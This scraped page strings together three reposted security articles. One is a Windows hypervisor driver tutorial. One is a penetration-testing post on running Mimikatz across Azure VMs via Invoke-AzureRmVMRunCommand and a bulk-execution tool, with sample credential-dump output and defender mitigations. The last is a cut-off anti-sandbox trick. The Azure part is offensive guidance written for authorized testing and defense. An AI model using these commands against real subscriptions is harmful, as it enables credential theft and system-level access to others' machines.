Hypervisor From Scratch – Part 2: Entering VMX Operation

Original text bySinaei )

Hi guys,

It’s the second part of a multiple series of a tutorial called “Hypervisor From Scratch”, First I highly recommend to read the first part (Basic Concepts & Configure Testing Environment) before reading this part, as it contains the basic knowledge you need to know in order to understand the rest of this tutorial.

In this section, we will learn about Detecting Hypervisor Support for our processor, then we simply config the basic stuff to Enable VMX and Entering VMX Operation and a lot more thing about Window Driver Kit (WDK).

Configuring Our IRP Major Functions

Beside our kernel-mode driver (“MyHypervisorDriver“), I created a user-mode application called “MyHypervisorApp“, first of all (The source code is available in my GitHub), I should encourage you to write most of your codes in user-mode rather than kernel-mode and that’s because you might not have handled exceptions so it leads to BSODs, or on the other hand, running less code in kernel-mode reduces the possibility of putting some nasty kernel-mode bugs.

If you remember from the previous part, we create some Windows Driver Kit codes, now we want to develop our project to support more IRP Major Functions.

IRP Major Functions are located in a conventional Windows table that is created for every device, once you register your device in Windows, you have to introduce these functions in which you handle these IRP Major Functions. That’s like every device has a table of its Major Functions and everytime a user-mode application calls any of these functions, Windows finds the corresponding function (if device driver supports that MJ Function) based on the device that requested by the user and calls it then pass an IRP pointer to the kernel driver.

Now its responsibility of device function to check the privileges or etc.

The following code creates the device :

12345678910111213 NTSTATUS NtStatus = STATUS_SUCCESS; UINT64 uiIndex = 0; PDEVICE_OBJECT pDeviceObject = NULL; UNICODE_STRING usDriverName, usDosDeviceName;  DbgPrint(«[*] DriverEntry Called.»);   RtlInitUnicodeString(&usDriverName, L»\\Device\\MyHypervisorDevice»); RtlInitUnicodeString(&usDosDeviceName, L»\\DosDevices\\MyHypervisorDevice»);  NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject); NTSTATUS NtStatusSymLinkResult = IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);

Note that our device name is “\Device\MyHypervisorDevice.

After that, we need to introduce our Major Functions for our device.

1234567891011121314151617 if (NtStatus == STATUS_SUCCESS && NtStatusSymLinkResult == STATUS_SUCCESS) { for (uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++) pDriverObject->MajorFunction[uiIndex] = DrvUnsupported;  DbgPrint(«[*] Setting Devices major functions.»); pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DrvClose; pDriverObject->MajorFunction[IRP_MJ_CREATE] = DrvCreate; pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvIOCTLDispatcher; pDriverObject->MajorFunction[IRP_MJ_READ] = DrvRead; pDriverObject->MajorFunction[IRP_MJ_WRITE] = DrvWrite;  pDriverObject->DriverUnload = DrvUnload; } else { DbgPrint(«[*] There was some errors in creating device.»); }

You can see that I put “DrvUnsupported” to all functions, this is a function to handle all MJ Functions and told the user that it’s not supported. The main body of this function is like this:

12345678910NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] This function is not supported 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

We also introduce other major functions that are essential for our device, we’ll complete the implementation in the future, let’s just leave them alone.

12345678910111213141516171819202122232425262728293031323334353637383940414243NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

Now let’s see IRP MJ Functions list and other types of Windows Driver Kit handlers routine.

IRP Major Functions List

This is a list of IRP Major Functions which we can use in order to perform different operations.

123456789101112131415161718192021222324252627282930#define IRP_MJ_CREATE                   0x00#define IRP_MJ_CREATE_NAMED_PIPE        0x01#define IRP_MJ_CLOSE                    0x02#define IRP_MJ_READ                     0x03#define IRP_MJ_WRITE                    0x04#define IRP_MJ_QUERY_INFORMATION        0x05#define IRP_MJ_SET_INFORMATION          0x06#define IRP_MJ_QUERY_EA                 0x07#define IRP_MJ_SET_EA                   0x08#define IRP_MJ_FLUSH_BUFFERS            0x09#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b#define IRP_MJ_DIRECTORY_CONTROL        0x0c#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d#define IRP_MJ_DEVICE_CONTROL           0x0e#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f#define IRP_MJ_SHUTDOWN                 0x10#define IRP_MJ_LOCK_CONTROL             0x11#define IRP_MJ_CLEANUP                  0x12#define IRP_MJ_CREATE_MAILSLOT          0x13#define IRP_MJ_QUERY_SECURITY           0x14#define IRP_MJ_SET_SECURITY             0x15#define IRP_MJ_POWER                    0x16#define IRP_MJ_SYSTEM_CONTROL           0x17#define IRP_MJ_DEVICE_CHANGE            0x18#define IRP_MJ_QUERY_QUOTA              0x19#define IRP_MJ_SET_QUOTA                0x1a#define IRP_MJ_PNP                      0x1b#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      // Obsolete….#define IRP_MJ_MAXIMUM_FUNCTION         0x1b

Every major function will only trigger if we call its corresponding function from user-mode. For instance, there is a function (in user-mode) called CreateFile (And all its variants like CreateFileA and CreateFileW for ASCII and Unicode) so everytime we call CreateFile the function that registered as IRP_MJ_CREATE will be called or if we call ReadFile then IRP_MJ_READ and WriteFile then IRP_MJ_WRITE  will be called. You can see that Windows treats its devices like files and everything we need to pass from user-mode to kernel-mode is available in PIRP Irp as a buffer when the function is called.

In this case, Windows is responsible to copy user-mode buffer to kernel mode stack.

Don’t worry we use it frequently in the rest of the project but we only support IRP_MJ_CREATE in this part and left others unimplemented for our future parts.

IRP Minor Functions

IRP Minor functions are mainly used for PnP manager to notify for a special event, for example,The PnP manager sends IRP_MN_START_DEVICE  after it has assigned hardware resources, if any, to the device or The PnP manager sends IRP_MN_STOP_DEVICE to stop a device so it can reconfigure the device’s hardware resources.

We will need these minor functions later in these series.

A list of IRP Minor Functions is available below:

1234567891011121314151617181920212223IRP_MN_START_DEVICEIRP_MN_QUERY_STOP_DEVICEIRP_MN_STOP_DEVICEIRP_MN_CANCEL_STOP_DEVICEIRP_MN_QUERY_REMOVE_DEVICEIRP_MN_REMOVE_DEVICEIRP_MN_CANCEL_REMOVE_DEVICEIRP_MN_SURPRISE_REMOVALIRP_MN_QUERY_CAPABILITIES IRP_MN_QUERY_PNP_DEVICE_STATEIRP_MN_FILTER_RESOURCE_REQUIREMENTSIRP_MN_DEVICE_USAGE_NOTIFICATIONIRP_MN_QUERY_DEVICE_RELATIONSIRP_MN_QUERY_RESOURCESIRP_MN_QUERY_RESOURCE_REQUIREMENTSIRP_MN_QUERY_IDIRP_MN_QUERY_DEVICE_TEXTIRP_MN_QUERY_BUS_INFORMATIONIRP_MN_QUERY_INTERFACEIRP_MN_READ_CONFIGIRP_MN_WRITE_CONFIGIRP_MN_DEVICE_ENUMERATEDIRP_MN_SET_LOCK

Fast I/O

For optimizing VMM, you can use Fast I/O which is a different way to initiate I/O operations that are faster than IRP. Fast I/O operations are always synchronous.

According to MSDN:

Fast I/O is specifically designed for rapid synchronous I/O on cached files. In fast I/O operations, data is transferred directly between user buffers and the system cache, bypassing the file system and the storage driver stack. (Storage drivers do not use fast I/O.) If all of the data to be read from a file is resident in the system cache when a fast I/O read or write request is received, the request is satisfied immediately. 

When the I/O Manager receives a request for synchronous file I/O (other than paging I/O), it invokes the fast I/O routine first. If the fast I/O routine returns TRUE, the operation was serviced by the fast I/O routine. If the fast I/O routine returns FALSE, the I/O Manager creates and sends an IRP instead.

The definition of Fast I/O Dispatch table is:

123456789101112131415161718192021222324252627282930typedef struct _FAST_IO_DISPATCH {  ULONG                                  SizeOfFastIoDispatch;  PFAST_IO_CHECK_IF_POSSIBLE             FastIoCheckIfPossible;  PFAST_IO_READ                          FastIoRead;  PFAST_IO_WRITE                         FastIoWrite;  PFAST_IO_QUERY_BASIC_INFO              FastIoQueryBasicInfo;  PFAST_IO_QUERY_STANDARD_INFO           FastIoQueryStandardInfo;  PFAST_IO_LOCK                          FastIoLock;  PFAST_IO_UNLOCK_SINGLE                 FastIoUnlockSingle;  PFAST_IO_UNLOCK_ALL                    FastIoUnlockAll;  PFAST_IO_UNLOCK_ALL_BY_KEY             FastIoUnlockAllByKey;  PFAST_IO_DEVICE_CONTROL                FastIoDeviceControl;  PFAST_IO_ACQUIRE_FILE                  AcquireFileForNtCreateSection;  PFAST_IO_RELEASE_FILE                  ReleaseFileForNtCreateSection;  PFAST_IO_DETACH_DEVICE                 FastIoDetachDevice;  PFAST_IO_QUERY_NETWORK_OPEN_INFO       FastIoQueryNetworkOpenInfo;  PFAST_IO_ACQUIRE_FOR_MOD_WRITE         AcquireForModWrite;  PFAST_IO_MDL_READ                      MdlRead;  PFAST_IO_MDL_READ_COMPLETE             MdlReadComplete;  PFAST_IO_PREPARE_MDL_WRITE             PrepareMdlWrite;  PFAST_IO_MDL_WRITE_COMPLETE            MdlWriteComplete;  PFAST_IO_READ_COMPRESSED               FastIoReadCompressed;  PFAST_IO_WRITE_COMPRESSED              FastIoWriteCompressed;  PFAST_IO_MDL_READ_COMPLETE_COMPRESSED  MdlReadCompleteCompressed;  PFAST_IO_MDL_WRITE_COMPLETE_COMPRESSED MdlWriteCompleteCompressed;  PFAST_IO_QUERY_OPEN                    FastIoQueryOpen;  PFAST_IO_RELEASE_FOR_MOD_WRITE         ReleaseForModWrite;  PFAST_IO_ACQUIRE_FOR_CCFLUSH           AcquireForCcFlush;  PFAST_IO_RELEASE_FOR_CCFLUSH           ReleaseForCcFlush;} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;

Defined Headers

I created the following headers (source.h) for my driver.

12345678910111213141516171819202122232425262728293031323334#pragma once#include <ntddk.h>#include <wdf.h>#include <wdm.h> extern void inline Breakpoint(void);extern void inline Enable_VMX_Operation(void);  NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath);VOID DrvUnload(PDRIVER_OBJECT  DriverObject);NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvIOCTLDispatcher(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp); VOID PrintChars(_In_reads_(CountChars) PCHAR BufferAddress, _In_ size_t CountChars);VOID PrintIrpInfo(PIRP Irp); #pragma alloc_text(INIT, DriverEntry)#pragma alloc_text(PAGE, DrvUnload)#pragma alloc_text(PAGE, DrvCreate)#pragma alloc_text(PAGE, DrvRead)#pragma alloc_text(PAGE, DrvWrite)#pragma alloc_text(PAGE, DrvClose)#pragma alloc_text(PAGE, DrvUnsupported)#pragma alloc_text(PAGE, DrvIOCTLDispatcher)   // IOCTL Codes and Its meanings#define IOCTL_TEST 0x1 // In case of testing

Now just compile your driver.

Loading Driver and Check the presence of Device

In order to load our driver (MyHypervisorDriver) first download OSR Driver Loader, then run Sysinternals DbgView as administrator make sure that your DbgView captures the kernel (you can check by going Capture -> Capture Kernel).

Enable Capturing Event

After that open the OSR Driver Loader (go to OsrLoader -> kit-> WNET -> AMD64 -> FRE) and open OSRLOADER.exe (in an x64 environment). Now if you built your driver, find .sys file (in MyHypervisorDriver\x64\Debug\ should be a file named: “MyHypervisorDriver.sys”), in OSR Driver Loader click to browse and select (MyHypervisorDriver.sys) and then click to “Register Service” after the message box that shows your driver registered successfully, you should click on “Start Service”.

Please note that you should have WDK installed for your Visual Studio in order to be able building your project.

Load Driver in OSR Driver Loader

Now come back to DbgView, then you should see that your driver loaded successfully and a message “[*] DriverEntry Called. ” should appear.

If there is no problem then you’re good to go, otherwise, if you have a problem with DbgView you can check the next step.

Keep in mind that now you registered your driver so you can use SysInternals WinObj in order to see whether “MyHypervisorDevice” is available or not.

WinObj

The Problem with DbgView

Unfortunately, for some unknown reasons, I’m not able to view the result of DbgPrint(), If you can see the result then you can skip this step but if you have a problem, then perform the following steps:

As I mentioned in part 1:

In regedit, add a key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

Under that , add a DWORD value named IHVDRIVER with a value of 0xFFFF

Reboot the machine and you’ll good to go.

It always works for me and I tested on many computers but my MacBook seems to have a problem.

In order to solve this problem, you need to find a Windows Kernel Global variable called, nt!Kd_DEFAULT_Mask, this variable is responsible for showing the results in DbgView, it has a mask that I’m not aware of so I just put a 0xffffffff in it to simply make it shows everything!

To do this, you need a Windows Local Kernel Debugging using Windbg.

  1. Open a Command Prompt window as Administrator. Enter bcdedit /debug on
  2. If the computer is not already configured as the target of a debug transport, enter bcdedit /dbgsettings local
  3. Reboot the computer.

After that you need to open Windbg with UAC Administrator privilege, go to File > Kernel Debug > Local > press OK and in you local Windbg find the nt!Kd_DEFAULT_Mask using the following command :

12prlkd> x nt!kd_Default_Maskfffff801`f5211808 nt!Kd_DEFAULT_Mask = <no type information>

Now change it value to 0xffffffff.

1lkd> eb fffff801`f5211808 ff ff ff ff
kd_DEFAULT_Mask

After that, you should see the results and now you’ll good to go.

Remember this is an essential step for the rest of the topic, because if we can’t see any kernel detail then we can’t debug.

DbgView

Detecting Hypervisor Support

Discovering support for vmx is the first thing that you should consider before enabling VT-x, this is covered in Intel Software Developer’s Manual volume 3C in section 23.6 DISCOVERING SUPPORT FOR VMX.

You could know the presence of VMX using CPUID if CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported.

First of all, we need to know if we’re running on an Intel-based processor or not, this can be understood by checking the CPUID instruction and find vendor string “GenuineIntel“.

The following function returns the vendor string form CPUID instruction.

12345678910111213141516171819202122232425262728293031323334353637string GetCpuID(){ //Initialize used variables char SysType[13]; //Array consisting of 13 single bytes/characters string CpuID; //The string that will be used to add all the characters to   //Starting coding in assembly language _asm { //Execute CPUID with EAX = 0 to get the CPU producer XOR EAX, EAX CPUID //MOV EBX to EAX and get the characters one by one by using shift out right bitwise operation. MOV EAX, EBX MOV SysType[0], al MOV SysType[1], ah SHR EAX, 16 MOV SysType[2], al MOV SysType[3], ah //Get the second part the same way but these values are stored in EDX MOV EAX, EDX MOV SysType[4], al MOV SysType[5], ah SHR EAX, 16 MOV SysType[6], al MOV SysType[7], ah //Get the third part MOV EAX, ECX MOV SysType[8], al MOV SysType[9], ah SHR EAX, 16 MOV SysType[10], al MOV SysType[11], ah MOV SysType[12], 00 } CpuID.assign(SysType, 12); return CpuID;}

The last step is checking for the presence of VMX, you can check it using the following code :

1234567891011121314151617181920bool VMX_Support_Detection(){  bool VMX = false; __asm { xor    eax, eax inc    eax cpuid bt     ecx, 0x5 jc     VMXSupport VMXNotSupport : jmp     NopInstr VMXSupport : mov    VMX, 0x1 NopInstr : nop }  return VMX;}

As you can see it checks CPUID with EAX=1 and if the 5th (6th) bit is 1 then the VMX Operation is supported. We can also perform the same thing in Kernel Driver.

All in all, our main code should be something like this:

123456789101112131415161718192021222324252627int main(){ string CpuID; CpuID = GetCpuID(); cout << «[*] The CPU Vendor is : » << CpuID << endl; if (CpuID == «GenuineIntel») { cout << «[*] The Processor virtualization technology is VT-x. \n»; } else { cout << «[*] This program is not designed to run in a non-VT-x environemnt !\n»; return 1; } if (VMX_Support_Detection()) { cout << «[*] VMX Operation is supported by your processor .\n»; } else { cout << «[*] VMX Operation is not supported by your processor .\n»; return 1; } _getch();    return 0;}

The final result:

User-mode app

Enabling VMX Operation

If our processor supports the VMX Operation then its time to enable it. As I told you above, IRP_MJ_CREATE is the first function that should be used to start the operation.

Form Intel Software Developer’s Manual (23.7 ENABLING AND ENTERING VMX OPERATION):

Before system software can enter VMX operation, it enables VMX by setting CR4.VMXE[bit 13] = 1. VMX operation is then entered by executing the VMXON instruction. VMXON causes an invalid-opcode exception (#UD) if executed with CR4.VMXE = 0. Once in VMX operation, it is not possible to clear CR4.VMXE. System software leaves VMX operation by executing the VMXOFF instruction. CR4.VMXE can be cleared outside of VMX operation after executing of VMXOFF.
VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are:

  •  Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both, as well as the lock bit.
  •  Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions.
  •  Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions.

Setting CR4 VMXE Bit

Do you remember the previous part where I told you how to create an inline assembly in Windows Driver Kit x64

Now you should create some function to perform this operation in assembly.

Just in Header File (in my case Source.h) declare your function:

1extern void inline Enable_VMX_Operation(void);

Then in assembly file (in my case SourceAsm.asm) add this function (Which set the 13th (14th) bit of Cr4).

1234567891011Enable_VMX_Operation PROC PUBLICpush rax ; Save the state xor rax,rax ; Clear the RAXmov rax,cr4or rax,02000h         ; Set the 14th bitmov cr4,rax pop rax ; Restore the stateretEnable_VMX_Operation ENDP

Also, declare your function in the above of SourceAsm.asm.

1PUBLIC Enable_VMX_Operation

The above function should be called in DrvCreate:

123456NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ Enable_VMX_Operation(); // Enabling VMX Operation DbgPrint(«[*] VMX Operation Enabled Successfully !»); return STATUS_SUCCESS;}

At last, you should call the following function from the user-mode:

123456789 HANDLE hWnd = CreateFile(L»\\\\.\\MyHypervisorDevice», GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, /// lpSecurityAttirbutes OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); /// lpTemplateFile

If you see the following result, then you completed the second part successfully.

Final Show

Important Note: Please consider that your .asm file should have a different name from your driver main file (.c file) for example if your driver file is “Source.c” then using the name “Source.asm” causes weird linking errors in Visual Studio, you should change the name of you .asm file to something like “SourceAsm.asm” to avoid these kinds of linker errors.

Conclusion

In this part, you learned about basic stuff you to know in order to create a Windows Driver Kit program and then we entered to our virtual environment so we build a cornerstone for the rest of the parts.

In the third part, we’re getting deeper with Intel VT-x and make our driver even more advanced so wait, it’ll be ready soon!

The source code of this topic is available at :

[https://github.com/SinaKarvandi/Hypervisor-From-Scratch/]

References

[1] Intel® 64 and IA-32 architectures software developer’s manual combined volumes 3 (https://software.intel.com/en-us/articles/intel-sdm

[2] IRP_MJ_DEVICE_CONTROL (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/irp-mj-device-control)

[3]  Windows Driver Kit Samples (https://github.com/Microsoft/Windows-driver-samples/blob/master/general/ioctl/wdm/sys/sioctl.c)

[4] Setting Up Local Kernel Debugging of a Single Computer Manually (https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-local-kernel-debugging-of-a-single-computer-manually)

[5] Obtain processor manufacturer using CPUID (https://www.daniweb.com/programming/software-development/threads/112968/obtain-processor-manufacturer-using-cpuid)

[6] Plug and Play Minor IRPs (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/plug-and-play-minor-irps)

[7] _FAST_IO_DISPATCH structure (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ns-wdm-_fast_io_dispatch)

[8] Filtering IRPs and Fast I/O (https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filtering-irps-and-fast-i-o)

[9] Windows File System Filter Driver Development (https://www.apriorit.com/dev-blog/167-file-system-filter-driver)

Реклама

Running PowerShell on Azure VMs at Scale

( Original text by Karl Fosaaen )

Let’s assume that you’re on a penetration test, where the Azure infrastructure is in scope (as it should be), and you have access to a domain account that happens to have “Contributor” rights on an Azure subscription. Contributor rights are typically harder to get, but we do see them frequently given out to developers, and if you’re lucky, an overly friendly admin may have added the domain users group as contributors for a subscription. Alternatively, we can assume that we started with a lesser privileged user and escalated up to the contributor account.

At this point, we could try to gather available credentialsdump configuration data, and attempt to further our access into other accounts (Owners/Domain Admins) in the subscription. For the purpose of this post, let’s assume that we’ve exhausted the read-only options and we’re still stuck with a somewhat privileged user that doesn’t allow us to pivot to other subscriptions (or the internal domain). At this point we may want to go after the virtual machines.

Attacking VMs

When attacking VMs, we could do some impactful testing and start pulling down snapshots of VHD files, but that’s noisy and nobody wants to download 100+ GB disk images. Since we like to tread lightly and work with the tools we have, let’s try for command execution on the VMs. In this example environment, let’s assume that none of the VMs are publicly exposed and you don’t want to open any firewall ports to allow for RDP or other remote management protocols.

Even without remote management protocols, there’s a couple of different ways that we can accomplish code execution in this Azure environment. You could run commands on Azure VMs using Azure Automation, but for this post we will be focusing on the Invoke-AzureRmVMRunCommand function (part of the AzureRM module).

This handy command will allow anyone with “Contributor” rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System. That’s right… VM command execution as System.

Running Individual Commands

You will want to run this command from an AzureRM session in PowerShell, that is authenticated with a Contributor account. You can authenticate to Azure with the Login-AzureRmAccount command.

Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript

Let’s breakdown the parameters:

  • ResourceGroupName – The Resource Group for the VM
  • VMName – The name of the VM
  • CommandId – The stored type of command to run through Azure.
    • “RunPowerShellScript” allows us to upload and run a PowerShell script, and we will just be using that CommandId for this blog.
  • ScriptPath – This is the path to your PowerShell PS1 file that you want to run

You can get both the VMName and ResourceGroupName by using the Get-AzureRmVM command. To make it easier for filtering, use this command:

PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

ResourceGroupName    Name       
-----------------    ----       
TESTRESOURCES        Remote-Test

In this example, we’ve added an extra line (Invoke-Mimikatz) to the end of the Invoke-Mimikatz.ps1 file to run the function after it’s been imported. Here is a sample run of the Invoke-Mimikatz.ps1 script on the VM (where no real accounts were logged in, ).

PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Value[0]        : 
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       :   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28) .## ^ ##.  
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 15 modules * * */
 
mimikatz(powershell) # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NetSPI-Test
Domain            : WORKGROUP
SID               : S-1-5-20         
        msv :
         [00000003] Primary
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * Password : waza1234/ 
mimikatz(powershell) # exit 
Bye!   
Value[1] : Code : ComponentStatus/StdErr/succeeded 
Level : Info 
DisplayStatus : Provisioning succeeded 
Message : 
Status : Succeeded 
Capacity : 0 
Count : 0

This is handy for running your favorite PS scripts on a couple of VMs (one at a time), but what if we want to scale this to an entire subscription?

Running Multiple Commands

I’ve added the Invoke-AzureRmVMBulkCMD function to MicroBurst to allow for execution of scripts against multiple VMs in a subscription. With this function, we can run commands against an entire subscription, a specific Resource Group, or just a list of individual hosts.

You can find MicroBurst here – https://github.com/NetSPI/MicroBurst

For our demo, we’ll run Mimikatz against all (5) of the VMs in my test subscription and write the output from the script to a log file.

Import-module MicroBurst.psm1 Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
Executing Mimikatz.ps1 against all (5) VMs in the TestingResources Subscription
Are you Sure You Want To Proceed: (Y/n):
VERBOSE: Running .\Mimikatz.ps1 on the Remote-EastUS2 - (10.2.10.4 : 52.179.214.3) virtual machine (1 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EastUS2 - (10.2.10.4 : 52.179.214.3)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-EAsia - (10.2.9.4 : 65.52.161.96) virtual machine (2 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EAsia - (10.2.9.4 : 65.52.161.96)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-JapanE - (10.2.12.4 : 13.78.40.185) virtual machine (3 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanE - (10.2.12.4 : 13.78.40.185)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-JapanW - (10.2.13.4 : 40.74.66.153) virtual machine (4 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanW - (10.2.13.4 : 40.74.66.153)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-France - (10.2.11.4 : 40.89.130.206) virtual machine (5 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-France - (10.2.11.4 : 40.89.130.206)
VERBOSE: Script Execution Completed in 98 seconds

The GIF above has been sped up for demo purposes, but the total time to run Mimikatz on the 5 VMs in this subscription was 7 Minutes and 14 seconds. It’s not ideal (see below), but it’s functional. I haven’t taken the time to multi-thread this yet, but if anyone would like to help, feel free to send in a pull request here.

Other Ideas

For the purposes of this demo, we just ran Mimikatz on all of the VMs. That’s nice, but it may not always be your best choice. Additional PowerShell options that you may want to consider:

  • Spawning Cobalt Strike, Empire, or Metasploit sessions
  • Searching for Sensitive Files
  • Run domain information gathering scripts on one VM and use the output to target other specific VMs for code execution

Performance Issues

As a friendly reminder, this was all done in a demo environment. If you choose to make use of this in the real world, keep this in mind: Not all Azure regions or VM images will respond the same way. I have found that some regions and VMs are better suited for running these commands. I have run into issues (stalling, failing to execute) with non-US Azure regions and the usage of these commands.

Your mileage may vary, but for the most part, I have had luck with the US regions and standard Windows Server 2012 images. In my testing, the Invoke-Mimikatz.ps1 script would usually take around 30-60 seconds to run. Keep in mind that the script has to be uploaded to the VM for each round of execution, and some of your VMs may be underpowered.

Mitigations and Detection

For the defenders that are reading this, please be careful with your Owner and Contributor rights. If you have one take away from the post, let it be this – Contributor rights means SYSTEM rights on all the VMs.

If you want to cut down your contributor’s rights to execute these commands, create a new role for your contributors and limit the Microsoft.Compute/virtualMachines/runCommand/action permissions for your users.

Additionally, if you want to detect this, keep an eye out for the “Run Command on Virtual Machine” log entries. It’s easy to set up alerts for this, and unless the Invoke-AzureRmVMRunCommand is an integral part of your VM management process, it should be easy to detect when someone is using this command.

The following alert logic will let you know when anyone tries to use this command (Success or Failure). You can also extend the scope of this alert to All VMs in a subscription.

As always, if you have any issues, comments, or improvements for this script, feel free to reach out via the MicroBurst Github page.

An anti-sandbox/anti-reversing trick using the GetClipboardOwner API

( Original text by Hexacorn )

This is a little nifty trick for detecting virtualization environments. At least, some of them.

Anytime you restore the snapshot of your virtual machine your guest OS environment will usually run some initialization tasks first. If we talk about VMWare these tasks will be ran by the vmtoolsd.exe process (of course, assuming you have the VMware Tools installed).

Some of the tasks this process performs include clipboard initialization, often placing whatever is in the clipboard on the host inside the clipboard belonging to the guest OS. And this activity is a bad ‘opsec’ of the guest software.

